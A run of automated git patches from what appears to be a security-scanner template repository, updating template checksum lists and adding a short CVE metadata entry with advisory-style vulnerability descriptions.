+http/technologies/wordpress/plugins/wp-reset.yaml:fbf5cf5d1273085a71df4b50f0a526ed9a70165a +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:505f198b6041d2e4b31eddd90386beeb4310292d +http/technologies/wordpress/plugins/wp-rollback.yaml:6b7dd0003361943caebaf587174789a48ed59e6c +http/technologies/wordpress/plugins/wp-seopress.yaml:3f92a09bc9739e383d741be5d858a58d08a47d7f +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:6160106f7f940638c19d77b61d2e6b1c350ed7e3 +http/technologies/wordpress/plugins/wp-smushit.yaml:312d166045b54aac744b887fa798a50b1a7bb38e +http/technologies/wordpress/plugins/wp-statistics.yaml:e5d2ceb34ee4f3d2c9d84249d297b551f98f4de0 +http/technologies/wordpress/plugins/wp-super-cache.yaml:1f8451a321e308dccdebda387ba6a203e670971a http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:891a9265c6034da1b6be7644fcdb6c349be33ccc +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:d4ae34cc5f7e9be5039671da848c314fcde4b5e8 +http/technologies/wordpress/plugins/wpforms-lite.yaml:a2136830770706d1fb76391759454afd52f187c9 +http/technologies/wordpress/plugins/wps-hide-login.yaml:53c84e8eeee8b6ed1d5a049ce28b36b9dc048239 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:681bc426531f4312d7d1e69c044860261bfd280f http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b5941ccb82e175594bb0454df4c13665033b27f7 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9228,7 +9232,7 @@ http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:053fcb11256eef5a62c09c7c6cb http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:3a975b7bbbfcebf3e5c188bcdd14cd7a3adfbcd2 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb -http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml:b8797fcb0e1cca380cf521add626044a9e5e23b6 +http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml:c08433834e3ea55effae1558d039e7a226024984 http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:863c7dc541872dcf963d4224201ce604030d618f http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e @@ -9491,7 +9495,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dce15795bb584b42d4892ed4853af511d2ac4562 +templates-checksum.txt:62c3a2dd13f8f199d4ae400e764e99cbeaec1a30 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4b225bf5692315fa450bcc54737561510c43cf3d Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:00:42 +0000 Subject: [PATCH 210/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 87efae5286..5e428382b6 100644 --- a/cves.json +++ b/cves.json @@ -2619,6 +2619,7 @@ {"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"} {"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} +{"ID":"CVE-2024-46310","Info":{"Name":"FXServer \u003c v9601 - Information Exposure","Severity":"medium","Description":"Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-46310.yaml"} {"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"} {"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"} {"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index b442dace3c..48ea6768f0 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -e2c650aa2b533a247598fb920bd38734 +9500bb9eed0648de44319a9fd94fbc06 From 5e6b491be431e73f84f9272c9a89cdf8fc2b63b1 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:00:47 +0000 Subject: [PATCH 211/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ff00bf4fc1..3698785f35 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2011,7 +2011,7 @@ http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e http/cves/2019/CVE-2019-6793.yaml:a4b8d723e1ff96297710cdd60f03ce6d5b377e9b http/cves/2019/CVE-2019-6799.yaml:b203bd17d30b9d7e352ceca21844491e6f33dea6 http/cves/2019/CVE-2019-6802.yaml:ded913b5a2ab640125f6e866e8b731d04c8b47a4 -http/cves/2019/CVE-2019-7139.yaml:19deaa9aa6f9d8c1d8f373d908b8c40d062aa6ae +http/cves/2019/CVE-2019-7139.yaml:ef2307ddbc9818b15144ddfd88401d2ddc4ee263 http/cves/2019/CVE-2019-7192.yaml:666b80bc55b3a523dcfcbdd3b31e22d53888a6f3 http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca @@ -9495,7 +9495,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:62c3a2dd13f8f199d4ae400e764e99cbeaec1a30 +templates-checksum.txt:b92700dca05e571a85de8dc13b1ba12de72af255 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2d51eb35563cfd81ee5ed3a09bb8e35393f4d919 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:01:26 +0000 Subject: [PATCH 212/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 346 ++++++++++++++++++++--------------------- 1 file changed, 173 insertions(+), 173 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3698785f35..b1ff731218 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -419,8 +419,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:74b3e1af12d1f57440d4bbd006dacf6eda56785a -cves.json:8f6a124dc64069cd9581783be5e2fcb6d45f0abd -cves.json-checksum.txt:776003c89c7f3e1694235967397f34ceb2891675 +cves.json:4ffa7a0f4523d9b296268dd0871532d017937d63 +cves.json-checksum.txt:13b46ed0db9ea39079c4acc6c721285e036d26ef dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -439,7 +439,7 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:322e63c2fde38a3f84d349820850fc73b dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:e4be137096c5190171b6ce4531571a828f2568ee -dast/vulnerabilities/sqli/time-based-sqli.yaml:2d69e409b7b2001dd2e93d74d57730d601e94788 +dast/vulnerabilities/sqli/time-based-sqli.yaml:a1def120919532df1a0f38449e374d90340ca22c dast/vulnerabilities/ssrf/blind-ssrf.yaml:27e68a58e240f97f21f3e0be91a88253d459a830 dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 @@ -1499,7 +1499,7 @@ http/cves/2015/CVE-2015-2067.yaml:0ffb662a14f050a398742d8acd2b2620a89ffa78 http/cves/2015/CVE-2015-2068.yaml:7c570e0b66635ba0d317627b57057a889405f186 http/cves/2015/CVE-2015-2080.yaml:b232c65718854a1049244802081c696ecc31eb82 http/cves/2015/CVE-2015-2166.yaml:2869726e68902758b097a2b7f02925968ef0aeff -http/cves/2015/CVE-2015-2196.yaml:bd31271f82bc747db7d750a1d9890ed09c4192d3 +http/cves/2015/CVE-2015-2196.yaml:81c15489dd11d2d5a2784e78c8baaf2f651ece81 http/cves/2015/CVE-2015-2755.yaml:ac90343bbd36f1d7328d675ac69317f3ae2a46bd http/cves/2015/CVE-2015-2794.yaml:2607c1dbe9a392adbe33d648e111dffddb149b35 http/cves/2015/CVE-2015-2807.yaml:180e358218f8ffbad75fb020b3c129f8f1248204 @@ -1511,7 +1511,7 @@ http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:2c99a2568eb635f5e58cd4803bb50ec3482c4d62 http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 -http/cves/2015/CVE-2015-4062.yaml:d4a83654180bb324c4ac0b909c3ab3226d404bb1 +http/cves/2015/CVE-2015-4062.yaml:51d172e00ee0f55898167d531ed7b786a50750fe http/cves/2015/CVE-2015-4063.yaml:73fd1011f479ba835d4e1df949c173e05e3fa187 http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 http/cves/2015/CVE-2015-4127.yaml:8e3cc35845ff4b07a83527875682fa9fb1c1c226 @@ -1541,7 +1541,7 @@ http/cves/2015/CVE-2015-8399.yaml:a504f142c32f0e890063057088ffb8c3b39c4a74 http/cves/2015/CVE-2015-8562.yaml:f3d77cde2bbf8a54251f32c4f6f2148dee44ccd5 http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 -http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc +http/cves/2015/CVE-2015-9323.yaml:557ab3af3a0f9ac7e8295ad65153c25f798ceb8a http/cves/2015/CVE-2015-9414.yaml:622709c3ec495a0ab85611f20d75bfd260de61bb http/cves/2015/CVE-2015-9480.yaml:70993e12643bcf8303d221fa8475aff4a9c0c1de http/cves/2016/CVE-2016-0957.yaml:5fe7ab27315e75f9be4a5f5ac0c9b3dd3fb948ce @@ -1777,7 +1777,7 @@ http/cves/2018/CVE-2018-15961.yaml:91a77b00d5c5fa3206a98ec5fc3916e053ac1ba3 http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 http/cves/2018/CVE-2018-16139.yaml:621dfc938dd3ae3ed95b76fb8c49f4fbc5b4e27f -http/cves/2018/CVE-2018-16159.yaml:a7a6a3ae41061f987b2008974fab416383f5a90a +http/cves/2018/CVE-2018-16159.yaml:c9051b9ef5790d9b5717c4b8d2cd0db39953509f http/cves/2018/CVE-2018-16167.yaml:176a380e5945ac18fc326e04621f5d433fa876a6 http/cves/2018/CVE-2018-16283.yaml:cd7733e319cc2abbe92fcc06861eed211c030486 http/cves/2018/CVE-2018-16288.yaml:28a0c7098ffd27a2ab982d73c4f5b71abd27f539 @@ -1854,7 +1854,7 @@ http/cves/2018/CVE-2018-7192.yaml:dee261f7aef33a023318b6f6dcee55fbb226c73f http/cves/2018/CVE-2018-7193.yaml:679664380d57f276bde1113eccdb51b317021a1f http/cves/2018/CVE-2018-7196.yaml:f429202bd8cd7b3c55a17c31ab4aef9cceb5e871 http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 -http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b +http/cves/2018/CVE-2018-7282.yaml:f4d5958a27826c91f4881d8a6420395024241ae2 http/cves/2018/CVE-2018-7314.yaml:dfed8b8206e6720d6d51363adc96f9ba89368e76 http/cves/2018/CVE-2018-7422.yaml:abb5ddf40bfea031bcdf4b40cb2bb8cc8bfa5653 http/cves/2018/CVE-2018-7467.yaml:1b0142f9c76787034d813d1cb3bf1d803ab77c63 @@ -2011,7 +2011,7 @@ http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e http/cves/2019/CVE-2019-6793.yaml:a4b8d723e1ff96297710cdd60f03ce6d5b377e9b http/cves/2019/CVE-2019-6799.yaml:b203bd17d30b9d7e352ceca21844491e6f33dea6 http/cves/2019/CVE-2019-6802.yaml:ded913b5a2ab640125f6e866e8b731d04c8b47a4 -http/cves/2019/CVE-2019-7139.yaml:ef2307ddbc9818b15144ddfd88401d2ddc4ee263 +http/cves/2019/CVE-2019-7139.yaml:6c6873f0ffaf560deb8d202bee5c71fc1a7d6772 http/cves/2019/CVE-2019-7192.yaml:666b80bc55b3a523dcfcbdd3b31e22d53888a6f3 http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca @@ -2059,7 +2059,7 @@ http/cves/2020/CVE-2020-11441.yaml:bc8c71e6aa3431cd300a31d6a9fe6b33d9440954 http/cves/2020/CVE-2020-11450.yaml:09220519d0db5db7c2a93fc06f80c6dae4f839ea http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 -http/cves/2020/CVE-2020-11530.yaml:80c9a47fde950d0a147cd5759e76fb36f9ddf865 +http/cves/2020/CVE-2020-11530.yaml:44c873bb82949e5cac0e5ae91a9c16eab232299e http/cves/2020/CVE-2020-11546.yaml:809df1e504319c19c3881dc5f465a611661993b8 http/cves/2020/CVE-2020-11547.yaml:a49d73b75b29a9582c172fc3ee5aa20c32778eac http/cves/2020/CVE-2020-11710.yaml:328459cf74b245b08f305b4da5b937778d78e9bd @@ -2122,7 +2122,7 @@ http/cves/2020/CVE-2020-16952.yaml:4ce0a0c082be805c3dd4822bd5214d0e4400e6ce http/cves/2020/CVE-2020-17362.yaml:73c86a5a4a59e4f50fa8943fc437acfef4d14c78 http/cves/2020/CVE-2020-17453.yaml:09430bfffaa517528900fefef8ab4890595a7c6c http/cves/2020/CVE-2020-17456.yaml:36bc3b3b798495d74160cedf8747faf400c93ad1 -http/cves/2020/CVE-2020-17463.yaml:9f44d84da08522dba61582a66775eafae5f8c65e +http/cves/2020/CVE-2020-17463.yaml:dbc73d8b8597f4cd5bd1cdaca4115e45e70ccb4f http/cves/2020/CVE-2020-17496.yaml:98940e0dde005cc27c7dc38614474f918e146b43 http/cves/2020/CVE-2020-17505.yaml:98f54ae7112117d8e7d0c1513d751e16279e93a5 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a @@ -2185,7 +2185,7 @@ http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f http/cves/2020/CVE-2020-26153.yaml:2fc5562b10f643840971b2a2aabeee2113cf2f3b http/cves/2020/CVE-2020-26214.yaml:c9550b0a95085975804bf0adf411947d89925d2e http/cves/2020/CVE-2020-26217.yaml:22e1a3fe2541425175198c852f37d342fbb87a0a -http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 +http/cves/2020/CVE-2020-26248.yaml:0f6d3e31e8651f35d75fbd164350c6d82bf5c2a5 http/cves/2020/CVE-2020-26258.yaml:7bde4ad5624f9c809c29343b361cf37151ae1c64 http/cves/2020/CVE-2020-26413.yaml:e9a55fce9e81f8b005fb221ff3ca9c55b1723f02 http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a @@ -2195,7 +2195,7 @@ http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 http/cves/2020/CVE-2020-2733.yaml:b52e91519a815bf092d7e7f7218c8a864b14fc5a http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 http/cves/2020/CVE-2020-27467.yaml:76b7fca1d3b0ad29b931134a22af2e4d4397cdb0 -http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c +http/cves/2020/CVE-2020-27481.yaml:76f0779d5f81bbe6c1d52d52a40477067582269b http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 http/cves/2020/CVE-2020-27838.yaml:edcfba1630f9ea7b0d31c4aaab3c0dce6007ebb0 http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 @@ -2385,7 +2385,7 @@ http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 http/cves/2021/CVE-2021-24316.yaml:4f664d0815cacf39455233fb049ba50fdab01c16 http/cves/2021/CVE-2021-24320.yaml:3312ea66f29708c1561b438f9a541a5db5eabb24 http/cves/2021/CVE-2021-24335.yaml:5985b81cfbe36c531356bfdf68f256254da8cc15 -http/cves/2021/CVE-2021-24340.yaml:29aa23594a737a65d066809ad76c5687dd47ad17 +http/cves/2021/CVE-2021-24340.yaml:eec0b1d43a07b928f0566d26f3ec898929eec503 http/cves/2021/CVE-2021-24342.yaml:ceb84cbf1d8ac8deb20a33fa994079cad1ab3ef5 http/cves/2021/CVE-2021-24347.yaml:6c90d296d8416631ebaf7ece4b121eaf79c098e6 http/cves/2021/CVE-2021-24351.yaml:10a1c630459cf99435e71b00505c5f64595ed030 @@ -2399,7 +2399,7 @@ http/cves/2021/CVE-2021-24407.yaml:fe029204152f2943f3231dcdc56772b13a6a0fbe http/cves/2021/CVE-2021-24409.yaml:ba7434588afb313756f4475dae0f1d7c010319d4 http/cves/2021/CVE-2021-24435.yaml:c2ec5e562bcc640a38deddebca4c7164b15f81bd http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:686b0519667c9157586828bec2956ab56ae9b4f7 +http/cves/2021/CVE-2021-24442.yaml:d2880bbde99e66af4af083d71afbcc3285a7fab5 http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a http/cves/2021/CVE-2021-24472.yaml:9d3d39323b308169053d75f81cfbbc324299f3ee http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 @@ -2407,29 +2407,29 @@ http/cves/2021/CVE-2021-24495.yaml:f4ecb1cb80b358b63faff083eccb92434ff2e6b9 http/cves/2021/CVE-2021-24498.yaml:2dab1759f9177c9b511cc29caefbff8a3e30778f http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 http/cves/2021/CVE-2021-24510.yaml:1e931f035d2345ecff4c534cfcef28fae8345c1d -http/cves/2021/CVE-2021-24554.yaml:e8341b35b6ad3ccd1b33edbffe1f61b464d6700d +http/cves/2021/CVE-2021-24554.yaml:bb889c7642ec43552d03e289b3214bc8967a7d16 http/cves/2021/CVE-2021-24627.yaml:e572f60f822aa60621dd9bca61f290b90e96a6c4 http/cves/2021/CVE-2021-24647.yaml:18c9d01f297fb0807334189d6e0c67dc881f6026 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac -http/cves/2021/CVE-2021-24731.yaml:6d56d8b4ce11d8c5416a2dc8a8ec0557b507e515 +http/cves/2021/CVE-2021-24731.yaml:a720e064fd4eb0f967cded7ff5bd076e4ff9d644 http/cves/2021/CVE-2021-24746.yaml:aaf375e2396c121de2a64543991c8850586bd8b4 http/cves/2021/CVE-2021-24750.yaml:33880dabf05f52290bc3bdf6ef6a71dbccbe0005 -http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a -http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 -http/cves/2021/CVE-2021-24827.yaml:30683918ed245e88d7562add1a91eb55c6c60fe8 +http/cves/2021/CVE-2021-24762.yaml:06435c1b15156f1cf1dad81c74b58a5b4db2f3b2 +http/cves/2021/CVE-2021-24791.yaml:81cbf6ad4db147492538222f1c097556828d9a60 +http/cves/2021/CVE-2021-24827.yaml:2e9e9f69d04891329b2256010f8288169683994e http/cves/2021/CVE-2021-24838.yaml:b0bc77f4126c393b78150ec6e3e6d3840c40a071 -http/cves/2021/CVE-2021-24849.yaml:4b6cc6305f5265004d22f577ae7c7e0c3c3fe12b -http/cves/2021/CVE-2021-24862.yaml:78adc2493ed043de4466a990011b3bc4f7c88fe6 +http/cves/2021/CVE-2021-24849.yaml:ed3ed1f52ed47011b0e3bb4aeb2f2bc4a12970ad +http/cves/2021/CVE-2021-24862.yaml:1591b32eda079f3e5e430d0b680c2d17b5b5dee2 http/cves/2021/CVE-2021-24875.yaml:78d31d54bfac674a34ecad0bbd7024aeb87c765c http/cves/2021/CVE-2021-24891.yaml:e6d166908034d8f8b7bce4130ea3924f2bb1dd23 http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 http/cves/2021/CVE-2021-24915.yaml:71b89a43ddc912b496a3573c6700b12b9d1707a8 http/cves/2021/CVE-2021-24917.yaml:c266a0fdaa11d4845b599de67c8a7943380fa539 http/cves/2021/CVE-2021-24926.yaml:10bf105c8ef639ba7fc985d7954915b69c33c4b1 -http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 +http/cves/2021/CVE-2021-24931.yaml:a27685c6629b789d53d50f303230c9aa6b8f8341 http/cves/2021/CVE-2021-24940.yaml:0481cbee1ce19ae7674a23128f0e1925164db6a7 -http/cves/2021/CVE-2021-24943.yaml:698d72411a74fef8cd89a5958eff7870fc010129 -http/cves/2021/CVE-2021-24946.yaml:5f09eec0c936dce40c7b346e73d3ab1e555b8026 +http/cves/2021/CVE-2021-24943.yaml:64ad2fc42036f54462fc23748f8da3664597e715 +http/cves/2021/CVE-2021-24946.yaml:9ed3ab12bebd8c1738101911574a0b18de64383f http/cves/2021/CVE-2021-24947.yaml:f91652cde78faaf0de5409ca19253ddd1ad4f11b http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 http/cves/2021/CVE-2021-24970.yaml:fe2f26a13278d271e48a316d9826bf197e66d730 @@ -2457,7 +2457,7 @@ http/cves/2021/CVE-2021-25099.yaml:9c14323218b138b43e2196b0d9665aaef686f140 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 http/cves/2021/CVE-2021-25111.yaml:ba58695551c73cbccfd585cb8bb325f9558843b6 http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:44442d02ad58b98a1f46118f9b7a26335dc3bcce +http/cves/2021/CVE-2021-25114.yaml:4e968e7e8a9b4ca749cd76cbfdf302e9026bd7ca http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:17afacb43d764c45b4c11ef9151650d2cad6cfe2 http/cves/2021/CVE-2021-25281.yaml:79d1459249cba40c4206e09d5ef25896ec77d5e5 @@ -2467,7 +2467,7 @@ 